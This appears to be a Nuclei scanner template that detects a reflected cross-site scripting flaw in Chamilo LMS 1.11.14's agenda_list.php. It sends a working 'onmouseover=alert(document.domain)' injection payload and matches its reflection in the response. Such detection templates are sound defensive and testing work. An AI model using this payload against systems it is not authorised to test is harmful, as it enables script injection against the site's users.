id: chamilo-lms-xss

info:
  name: Chamilo LMS 1.11.14 Cross-Site Scripting
  author: geeknik
  severity: high
  description: Chamilo LMS 1.11.14 is vulnerable to cross-site scripting.
  reference:
    - https://www.netsparker.com/web-applications-advisories/ns-21-001-cross-site-scripting-in-chamilo-lms/
    - https://support.chamilo.org/projects/chamilo-18/wiki/Security_issues#Issue-45-2021-01-21-Moderate-impact-moderate-risk-XSS-vulnerability-in-agenda
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,chamilo

http:
  - method: GET
    path:
      - '{{BaseURL}}/main/calendar/agenda_list.php?type=xss"+onmouseover=alert(document.domain)+"'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'agenda_js.php?type=xss" onmouseover=alert(document.domain)'

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"
# digest: 4a0a0047304502204ea94653ba49d5361a872da3e2e648cc6843a890c075f045fdf16eb96bc18e79022100e757b758c9bf54ef6bd695ae5b0b1ff23d7a7c4772b681e41477360846b6e60d:922c64590222798bb761d5b6d8e72950